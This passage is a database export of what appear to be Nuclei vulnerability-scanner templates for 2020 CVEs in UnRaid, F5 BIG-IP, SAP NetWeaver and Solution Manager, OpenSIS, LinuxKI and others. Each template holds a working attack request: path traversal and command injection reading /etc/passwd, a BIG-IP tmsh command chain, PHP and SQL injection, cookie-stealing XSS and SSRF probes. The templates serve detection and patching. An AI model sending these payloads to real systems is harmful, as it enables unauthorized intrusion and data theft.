https://github.com/404notf0und/CVE-Flow\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-5777\n cwe-id: CWE-287\n epss-score: 0.04038\n epss-percentile: 0.91885\n cpe: cpe:2.3:a:magmi_project:magmi:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: 
magmi_project\n product: magmi\n shodan-query: http.component:\"Magento\"\n tags: cve,cve2020,plugin,tenable,magmi,magento,auth,bypass,magmi_project\n\nhttp:\n - raw:\n - |\n GET /index.php/catalogsearch/advanced/result/?name=e HTTP/1.1\n Host: {{Hostname}}\n Connection: close\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"Too many connections\"\n\n - type: status\n status:\n - 503\n# digest: 4a0a0047304502205820aaf2c8d68c763616b3a1f2410b79857f447e47178528d8734e381ebdfa5702210083e2d7d81bc04ccc7035150e82144ebe4423dec3ae46947f57415373d7131908:922c64590222798bb761d5b6d8e72950", "hash": "1b8f2fe9c0424cabc3c67a29834bb438", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30822a" }, "name": "CVE-2020-5847.yaml", "content": "id: CVE-2020-5847\n\ninfo:\n name: UnRaid <=6.80 - Remote Code Execution\n author: madrobot\n severity: critical\n description: UnRaid <=6.80 allows remote unauthenticated attackers to execute arbitrary code.\n remediation: |\n Upgrade UnRaid to a version higher than 6.80 to mitigate the vulnerability.\n reference:\n - https://sysdream.com/news/lab/2020-02-06-cve-2020-5847-cve-2020-5849-unraid-6-8-0-unauthenticated-remote-code-execution-as-root/\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5847\n - https://sysdream.com/news/lab/\n - https://forums.unraid.net/forum/7-announcements/\n - https://github.com/Ostorlab/KEV\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-5847\n cwe-id: CWE-94,CWE-668\n epss-score: 0.97053\n epss-percentile: 0.99741\n cpe: cpe:2.3:a:unraid:unraid:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: unraid\n product: unraid\n tags: cve2020,cve,rce,kev,unraid\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/webGui/images/green-on.png/?path=x&site[x][text]=%3C?php%20echo%20md5(%22CVE-2020-5847%22);%20?%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - 
\"b13928fbcfff659363d7c7d1ec008d56\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100c9920c55bcaddbf53b6fcb8b64faa2b15937e414ee150f5d6d41a8df48012b9c02202e53c68150b40af20af58dc5ddb6ecd2e658c1072a876363cc18f781a45d9442:922c64590222798bb761d5b6d8e72950", "hash": "cda4cf1a00a3328588141462e3508583", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30822b" }, "name": "CVE-2020-5902.yaml", "content": "id: CVE-2020-5902\n\ninfo:\n name: F5 BIG-IP TMUI - Remote Code Execution\n author: madrobot,dwisiswant0,ringo\n severity: critical\n description: In F5 BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Apply the necessary security patches or upgrade to a non-vulnerable version of F5 BIG-IP TMUI.\n reference:\n - http://packetstormsecurity.com/files/158333/BIG-IP-TMUI-Remote-Code-Execution.html\n - http://packetstormsecurity.com/files/158334/BIG-IP-TMUI-Remote-Code-Execution.html\n - http://packetstormsecurity.com/files/158366/F5-BIG-IP-TMUI-Directory-Traversal-File-Upload-Code-Execution.html\n - http://packetstormsecurity.com/files/158414/Checker-CVE-2020-5902.html\n - http://packetstormsecurity.com/files/158581/F5-Big-IP-13.1.3-Build-0.0.6-Local-File-Inclusion.html\n - https://badpackets.net/over-3000-f5-big-ip-endpoints-vulnerable-to-cve-2020-5902/\n - https://github.com/Critical-Start/Team-Ares/tree/master/CVE-2020-5902\n - https://support.f5.com/csp/article/K52145254\n - https://swarm.ptsecurity.com/rce-in-f5-big-ip/\n - https://www.criticalstart.com/f5-big-ip-remote-code-execution-exploit/\n - https://www.kb.cert.org/vuls/id/290915\n - https://nvd.nist.gov/vuln/detail/CVE-2020-5902\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-5902\n cwe-id: CWE-22\n epss-score: 0.97563\n epss-percentile: 0.99998\n cpe: cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*\n metadata:\n max-request: 8\n vendor: f5\n product: big-ip_access_policy_manager\n tags: cve,cve2020,bigip,rce,kev,packetstorm,f5\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd\"\n - \"{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release\"\n - \"{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license\"\n - \"{{BaseURL}}/hsqldb%0a\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n - \"BIG-IP release ([\\\\d.]+)\"\n - \"[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{7}\"\n - \"HSQL Database Engine Servlet\"\n condition: or\n\n - type: status\n status:\n - 200\n\n - raw:\n - |\n POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1\n Host: {{Hostname}}\n\n command=create%20cli%20alias%20private%20list%20command%20bash\n - |\n POST /tmui/locallb/workspace/fileSave.jsp HTTP/1.1\n Host: {{Hostname}}\n\n fileName=%2Ftmp%2Fnonexistent&content=echo%20%27aDNsbDBfdzBSbGQK%27%20%7C%20base64%20-d\n - |\n POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1\n Host: {{Hostname}}\n\n command=list%20%2Ftmp%2Fnonexistent\n - |\n POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1\n Host: {{Hostname}}\n\n command=delete%20cli%20alias%20private%20list\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"h3ll0_w0Rld\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100aaf96da5a395053ea0372436ce504a37792ef36260bedf3723f869204d02cba902210083fd967a9f70ee938de4df948e3283c15e48c9e808d5cb0cc4e2dcbf1be556a6:922c64590222798bb761d5b6d8e72950", "hash": 
"5987ed3eff5c5019f52949cb545d9228", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30822c" }, "name": "CVE-2020-6171.yaml", "content": "id: CVE-2020-6171\n\ninfo:\n name: CLink Office 2.0 - Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: |\n CLink Office 2.0 is vulnerable to cross-site scripting in the index page of the management console and allows remote attackers to inject arbitrary web script or HTML via the lang parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix this vulnerability.\n reference:\n - https://www.deepcode.ca/index.php/2020/04/07/cve-2020-xss-in-clink-office-v2/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-6171\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-6171\n cwe-id: CWE-79\n epss-score: 0.00135\n epss-percentile: 0.48556\n cpe: cpe:2.3:a:communilink:clink_office:2.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: communilink\n product: clink_office\n tags: cve,cve2020,xss,clink-office,communilink\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}?lang=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cp%20class=%22&p=1\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\">'\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a004830460221009e23ab89fad66085d2ab6cb456e4c728a76f6e0356382f5a3dd513a6fd51542b0221009f4227865760ac839ec656f971b5230460f06c7e99b7e78779556b224ce7a7fd:922c64590222798bb761d5b6d8e72950", "hash": "e8cf34131e5ef66e1e50095b52586780", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": 
"66477a413521042ccf30822d" }, "name": "CVE-2020-6207.yaml", "content": "id: CVE-2020-6207\n\ninfo:\n name: SAP Solution Manager 7.2 - Remote Command Execution\n author: _generic_human_\n severity: critical\n description: SAP Solution Manager (SolMan) running version 7.2 has a remote command execution vulnerability within the SAP EEM servlet (tc~smd~agent~application~eem). The vulnerability occurs due to missing authentication checks when submitting SOAP requests to the /EemAdminService/EemAdmin page to get information about connected SMDAgents, send HTTP request (SSRF), and execute OS commands on connected SMDAgent.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the affected system.\n remediation: |\n Apply the latest security patches provided by SAP to mitigate this vulnerability.\n reference:\n - https://launchpad.support.sap.com/#/notes/2890213\n - https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=540935305\n - https://i.blackhat.com/USA-20/Wednesday/us-20-Artuso-An-Unauthenticated-Journey-To-Root-Pwning-Your-Companys-Enterprise-Software-Servers-wp.pdf\n - https://github.com/chipik/SAP_EEM_CVE-2020-6207\n - https://www.rapid7.com/db/modules/auxiliary/admin/sap/cve_2020_6207_solman_rce/\n - https://www.rapid7.com/db/modules/exploit/multi/sap/cve_2020_6207_solman_rs/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-6207\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-6207\n cwe-id: CWE-306\n epss-score: 0.97437\n epss-percentile: 0.99941\n cpe: cpe:2.3:a:sap:solution_manager:7.20:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: sap\n product: solution_manager\n tags: cve2020,cve,sap,solman,rce,kev\n\nhttp:\n - raw:\n - |\n POST /EemAdminService/EemAdmin HTTP/1.1\n Host: {{Hostname}}\n SOAPAction: \"\"\n Content-Type: text/xml; charset=UTF-8\n Connection: close\n\n \n\n matchers-condition: and\n matchers:\n - type: 
word\n part: body\n words:\n - \":Envelope\"\n - \":Body\"\n - \":getAllAgentInfoResponse\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/xml\"\n - \"SAP NetWeaver Application Server\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402206f10f6390a1f28d284757ba7222f8e714ac03076c664a8120f972e03a1f21b0e022076e4a6fb68aa6b3cf516332820510096fc1215afa44a1de9d081510ecac38195:922c64590222798bb761d5b6d8e72950", "hash": "4025d22d24cf6e0a2084788f8cdf0dca", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30822e" }, "name": "CVE-2020-6287.yaml", "content": "id: CVE-2020-6287\n\ninfo:\n name: SAP NetWeaver AS JAVA 7.30-7.50 - Remote Admin Addition\n author: dwisiswant0\n severity: critical\n description: SAP NetWeaver AS JAVA (LM Configuration Wizard), versions 7.30, 7.31, 7.40, 7.50, does not perform an authentication check which allows an attacker without prior authentication to execute configuration tasks to perform critical actions against the SAP Java system, including the ability to create an administrative user, and therefore compromising Confidentiality, Integrity and Availability of the system.\n impact: |\n Successful exploitation of this vulnerability allows an attacker to gain unauthorized administrative access to the SAP system.\n remediation: |\n Apply the relevant SAP Security Note or patch provided by the vendor to mitigate this vulnerability.\n reference:\n - https://launchpad.support.sap.com/#/notes/2934135\n - https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=552599675\n - https://www.onapsis.com/recon-sap-cyber-security-vulnerability\n - https://github.com/chipik/SAP_RECON\n - https://nvd.nist.gov/vuln/detail/CVE-2020-6287\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\n cvss-score: 10\n cve-id: CVE-2020-6287\n cwe-id: CWE-306\n epss-score: 0.97502\n epss-percentile: 0.99977\n cpe: 
cpe:2.3:a:sap:netweaver_application_server_java:7.30:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: sap\n product: netweaver_application_server_java\n shodan-query: http.favicon.hash:-266008933\n tags: cve,cve2020,sap,kev\n\nhttp:\n - raw:\n - |\n POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1\n Host: {{Hostname}}\n Content-Type: text/xml; charset=UTF-8\n Connection: close\n\n sap.com/tc~lm~config~contentcontent/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc\n 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\n userDetails\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"CTCWebServiceSi\"\n - \"SOAP-ENV\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/xml\"\n - \"SAP NetWeaver Application Server\"\n\n - type: status\n status:\n - 200\n\n# userName - sapRpoc6351\n# password - Secure!PwD8890\n# digest: 490a0046304402206c4b14491ea982f8a08dec5bcee88849e6ebc6b36ce428baa9d12c28e5893bb6022032ff0dcf67cb9db8e3042c6245bb9c3aa286d537c7f1c46e8a741f955b60bcb7:922c64590222798bb761d5b6d8e72950", "hash": "15a4c8e0674f8ea837bcd8b0e70c45d1", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30822f" }, "name": "CVE-2020-6308.yaml", "content": "id: CVE-2020-6308\n\ninfo:\n name: SAP BusinessObjects Business Intelligence Platform - Blind Server-Side Request Forgery\n author: madrobot\n severity: medium\n description: |\n SAP BusinessObjects Business Intelligence Platform (Web Services) 410, 420, and 430 is susceptible to blind server-side request forgery. An attacker can inject arbitrary values as CMS parameters to perform lookups on the internal network, which is otherwise not accessible externally. 
On successful exploitation, an attacker can scan the network to determine the infrastructure and gather information for further attacks such as remote file inclusion, retrieving server files, bypassing the firewall, and forcing malicious requests.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to send arbitrary requests from the vulnerable server, potentially leading to unauthorized access to internal resources or further attacks.\n remediation: |\n Apply the relevant security patches provided by SAP to mitigate this vulnerability.\n reference:\n - https://github.com/InitRoot/CVE-2020-6308-PoC\n - https://launchpad.support.sap.com/#/notes/2943844\n - https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=558632196\n - https://nvd.nist.gov/vuln/detail/CVE-2020-6308\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2020-6308\n cwe-id: CWE-918\n epss-score: 0.004\n epss-percentile: 0.73121\n cpe: cpe:2.3:a:sap:businessobjects_business_intelligence_platform:4.1:-:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: sap\n product: businessobjects_business_intelligence_platform\n tags: cve2020,cve,sap,ssrf,oast,unauth\n\nhttp:\n - raw:\n - |\n POST /AdminTools/querybuilder/logon?framework= HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n aps={{interactsh-url}}&usr=anything&pwd=anything&aut=secEnterprise&main_page=ie.jsp&new_pass_page=newpwdform.jsp&exit_page=logonform.jsp\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the DNS Interaction\n words:\n - \"dns\"\n\n - type: word\n part: location\n words:\n - \"{{BaseURL}}/AdminTools/querybuilder/logonform.jsp\"\n# digest: 4a0a0047304502206fcb723e77d14f6dfba93f21bf79b8017cfc96c4e7d4e0fbfa8fbf743a53cb9d022100b1dc9f0cc68fc6eceb0f30bbef24ce3526fed3c2fc7b3a2c9dc58a315871a212:922c64590222798bb761d5b6d8e72950", "hash": 
"7f7662d58557d3209b0d30bfd213f307", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308230" }, "name": "CVE-2020-6637.yaml", "content": "id: CVE-2020-6637\n\ninfo:\n name: OpenSIS 7.3 - SQL Injection\n author: pikpikcu\n severity: critical\n description: OpenSIS Community Edition version 7.3 is vulnerable to SQL injection via the USERNAME parameter of index.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage.\n remediation: |\n Apply the latest security patch or upgrade to a patched version of OpenSIS.\n reference:\n - https://cinzinga.com/CVE-2020-6637/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-6637\n - https://sourceforge.net/projects/opensis-ce/files/\n - https://github.com/OS4ED/openSIS-Responsive-Design/commit/1127ae0bb7c3a2883febeabc6b71ad8d73510de8\n - https://opensis.com/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-6637\n cwe-id: CWE-89\n epss-score: 0.02067\n epss-percentile: 0.87871\n cpe: cpe:2.3:a:os4ed:opensis:7.3:*:*:*:community:*:*:*\n metadata:\n max-request: 3\n vendor: os4ed\n product: opensis\n shodan-query: http.title:\"openSIS\"\n tags: cve,cve2020,sqli,opensis,os4ed\n\nhttp:\n - method: POST\n path:\n - '{{BaseURL}}/account/index.php'\n - '{{BaseURL}}/opensis/index.php'\n - '{{BaseURL}}/index.php'\n\n body: |\n USERNAME=%27%29or%601%60%3D%601%60%3B--+-&PASSWORD=A&language=en&log=\n\n headers:\n Content-Type: application/x-www-form-urlencoded\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'SQL STATEMENT:'\n - \"UPDATE login_authentication SET FAILED_LOGIN=FAILED_LOGIN+1 WHERE UPPER(USERNAME)=UPPER(NULL)or`1`=`1`;-- -')\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n condition: and\n\n - type: status\n status:\n - 200\n# 
digest: 4a0a00473045022018750f0e8502dd291ed8d45bff59f86bec81babc9ea9b413e6447a90544c50de022100ab7a78866d15bc653144d93e47bf47daea15d96bee6b942339ef913d90181e9f:922c64590222798bb761d5b6d8e72950", "hash": "1c746fcc0af9078c51e2b1455dd100ca", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308231" }, "name": "CVE-2020-6950.yaml", "content": "id: CVE-2020-6950\n\ninfo:\n name: Eclipse Mojarra - Local File Read\n author: iamnoooob,pdresearch\n severity: medium\n description: |\n Directory traversal in Eclipse Mojarra before 2.3.14 allows attackers to read arbitrary files via the loc parameter or con parameter.\n reference:\n - https://github.com/eclipse-ee4j/mojarra/commit/cefbb9447e7be560e59da2da6bd7cb93776f7741\n - https://github.com/eclipse-ee4j/mojarra/issues/4571\n - https://nvd.nist.gov/vuln/detail/CVE-2020-6950\n - https://bugs.eclipse.org/bugs/show_bug.cgi?id=550943\n - https://www.oracle.com/security-alerts/cpuapr2022.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N\n cvss-score: 6.5\n cve-id: CVE-2020-6950\n cwe-id: CWE-22\n epss-score: 0.03924\n epss-percentile: 0.91792\n cpe: cpe:2.3:a:eclipse:mojarra:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 4\n vendor: eclipse\n product: mojarra\n shodan-query: html:\"javax.faces.resource\"\n fofa-query: body=\"javax.faces.ViewState\"\n tags: cve,cve2020,mojarra,lfi,eclipse\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/javax.faces.resources/web.xml.jsf?loc=/../../WEB-INF\"\n - \"{{BaseURL}}/javax.faces.resources/web.xml.jsf?con=/../../WEB-INF\"\n - \"{{BaseURL}}/javax.faces.resources/faces-config.xml.jsf?loc=/../../WEB-INF\"\n - \"{{BaseURL}}/javax.faces.resources/faces-config.xml.jsf?con=/../../WEB-INF\"\n\n stop-at-first-match: true\n matchers:\n - type: dsl\n dsl:\n - 'status_code == 200'\n - 'contains(header, \"application/xml\")'\n - 'contains_all(body, \"\") || contains_all(body, \"\")'\n condition: and\n# digest: 
490a00463044022057bb165b69bcd6a648332fd9637fcd2daef818312700aca402b735e74e3bab7a022039da250736c313317b03ff12fb722f320b0ecfd1338eab919975feb262de5717:922c64590222798bb761d5b6d8e72950", "hash": "03a4f2695e5f94319771cfeaa935fc99", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308232" }, "name": "CVE-2020-7107.yaml", "content": "id: CVE-2020-7107\n\ninfo:\n name: WordPress Ultimate FAQ <1.8.30 - Cross-Site Scripting\n author: theamanrawat\n severity: medium\n description: |\n WordPress Ultimate FAQ plugin before 1.8.30 is susceptible to cross-site scripting via Display_FAQ to Shortcodes/DisplayFAQs.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could lead to the execution of arbitrary script code in the context of the affected website, potentially allowing an attacker to steal sensitive information or perform unauthorized actions.\n remediation: Fixed in version 1.8.30.\n reference:\n - https://wpscan.com/vulnerability/5e1cefd5-5369-44bd-aef7-2a382c8d8e33\n - https://wordpress.org/plugins/ultimate-faqs/\n - https://plugins.trac.wordpress.org/changeset/2222959/ultimate-faqs/tags/1.8.30/Shortcodes/DisplayFAQs.php\n - https://nvd.nist.gov/vuln/detail/CVE-2020-7107\n - https://wordpress.org/plugins/ultimate-faqs/#developers\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-7107\n cwe-id: CWE-79\n epss-score: 0.00395\n epss-percentile: 0.70653\n cpe: cpe:2.3:a:etoilewebdesign:ultimate_faq:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: etoilewebdesign\n product: ultimate_faq\n framework: wordpress\n tags: cve,cve2020,ultimate-faqs,wpscan,xss,wordpress,wp-plugin,wp,etoilewebdesign\n\nflow: http(1) && 
http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/ultimate-faqs/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'Ultimate FAQ'\n - 'Tags:'\n condition: and\n\n - method: GET\n path:\n - \"{{BaseURL}}/?Display_FAQ=%3C/script%3E%3Csvg/onload=alert(document.cookie)%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"'\"\n - \"var Display_FAQ_ID =\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100a98c36c0d43554a80a17b855979ba9b1afd278daecb5f8105fca20d49ac064d4022100b582ef9291592f99197ce65d483f2f18702a4dace55e3b8e7f2fd8626364c8ac:922c64590222798bb761d5b6d8e72950", "hash": "6883a35e94b42b178e483be515a0f469", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308233" }, "name": "CVE-2020-7136.yaml", "content": "id: CVE-2020-7136\n\ninfo:\n name: HPE Smart Update Manager < 8.5.6 - Remote Unauthorized Access\n author: gy741\n severity: critical\n description: HPE Smart Update Manager (SUM) prior to version 8.5.6 could allow remote unauthorized access.\n impact: |\n An attacker can gain unauthorized access to the HPE Smart Update Manager, potentially leading to further compromise of the system.\n remediation: Hewlett Packard Enterprise has provided a software update to resolve this vulnerability in HPE Smart Update Manager (SUM) prior to 8.5.6. Please visit the HPE Support Center at https://support.hpe.com/hpesc/public/home to download the latest version of HPE Smart Update Manager (SUM). 
Download the latest version of HPE Smart Update Manager (SUM) or download the latest Service Pack For ProLiant (SPP).\n reference:\n - https://www.tenable.com/security/research/tra-2020-02\n - https://support.hpe.com/hpesc/public/docDisplay?docLocale=en_US&docId=emr_na-hpesbmu03997en_us\n - https://nvd.nist.gov/vuln/detail/CVE-2020-7136\n - https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbmu03997en_us\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-7136\n cwe-id: CWE-288\n epss-score: 0.26929\n epss-percentile: 0.96662\n cpe: cpe:2.3:a:hpe:smart_update_manager:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: hpe\n product: smart_update_manager\n tags: cve,cve2020,hp,auth-bypass,hpe,tenable\n\nhttp:\n - raw:\n - |\n POST /session/create HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n Content-Type: application/json\n\n {\"hapi\":{\"username\":\"Administrator\",\"password\":\"any_password\",\"language\":\"en\",\"mode\":\"gui\", \"usesshkey\":true, \"privatekey\":\"any_privateky\", \"passphrase\":\"any_passphase\",\"settings\":{\"output_filter\":\"passed\",\"port_number\":\"444\"}}}\n - |\n GET /session/{{sessionid}}/node/index HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n part: body\n words:\n - \"hmessage\"\n - \"Command completed successfully.\"\n - \"node_name\"\n condition: and\n\n extractors:\n - type: regex\n name: sessionid\n group: 1\n regex:\n - '\"sessionId\":\"([a-z0-9.]+)\"'\n internal: true\n part: body\n# digest: 4a0a004730450221009f65af7463005817eaf2c8b1d20ecc91865dc0bc33b2e3eb7d8ee11b885a7a7a02207baf70efdf4cb2b174edd1bb6a8c71233fb6f7d3c54f74aa1b93db5446ddb5a2:922c64590222798bb761d5b6d8e72950", "hash": "34ff62fcab95765005f4305ea2c0a834", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308234" }, "name": "CVE-2020-7209.yaml", "content": "id: 
CVE-2020-7209\n\ninfo:\n name: LinuxKI Toolset <= 6.01 - Remote Command Execution\n author: dwisiswant0\n severity: critical\n description: LinuxKI v6.0-1 and earlier are vulnerable to remote code execution.\n impact: |\n Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system.\n remediation: This is resolved in release 6.0-2.\n reference:\n - http://packetstormsecurity.com/files/157739/HP-LinuxKI-6.01-Remote-Command-Injection.html\n - http://packetstormsecurity.com/files/158025/LinuxKI-Toolset-6.01-Remote-Command-Execution.html\n - https://github.com/HewlettPackard/LinuxKI/releases/tag/v6.0-2\n - https://github.com/HewlettPackard/LinuxKI/commit/10bef483d92a85a13a59ca65a288818e92f80d78\n - https://www.hpe.com/us/en/home.html\n - https://nvd.nist.gov/vuln/detail/CVE-2020-7209\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-7209\n epss-score: 0.97202\n epss-percentile: 0.99806\n cpe: cpe:2.3:a:hp:linuxki:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: hp\n product: linuxki\n tags: cve,cve2020,rce,packetstorm,hp\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/linuxki/experimental/vis/kivis.php?type=kitrace&pid=0;echo%20START;cat%20/etc/passwd;echo%20END;\"\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n# digest: 4a0a004730450221008918f007005c4bd18c47d5bd3d0b1d74255d1ec310d880c39358415ae1b283d5022004aa9c23cc199e0a314102ed9d1ce95519a69938084464c7146e9a8b5e8bc434:922c64590222798bb761d5b6d8e72950", "hash": "27a8b184551f322e5826eec119f0d476", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308235" }, "name": "CVE-2020-7318.yaml", "content": "id: CVE-2020-7318\n\ninfo:\n name: McAfee ePolicy Orchestrator <5.10.9 Update 9 - Cross-Site Scripting\n author: dwisiswant0\n severity: medium\n description: |\n McAfee ePolicy Orchestrator before 5.10.9 
Update 9 is susceptible to cross-site scripting, which allows administrators to inject arbitrary web script or HTML via multiple parameters where the administrator's entries were not correctly sanitized.\n reference:\n - https://swarm.ptsecurity.com/vulnerabilities-in-mcafee-epolicy-orchestrator/\n - https://kc.mcafee.com/corporate/index?page=content&id=SB10332\n - https://nvd.nist.gov/vuln/detail/CVE-2020-7318\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking or unauthorized actions.\n remediation: |\n Upgrade to McAfee ePolicy Orchestrator version 5.10.9 Update 9 or later to mitigate this vulnerability.\n classification:\n cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 4.3\n cve-id: CVE-2020-7318\n cwe-id: CWE-79\n epss-score: 0.00065\n epss-percentile: 0.26966\n cpe: cpe:2.3:a:mcafee:epolicy_orchestrator:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: mcafee\n product: epolicy_orchestrator\n tags: 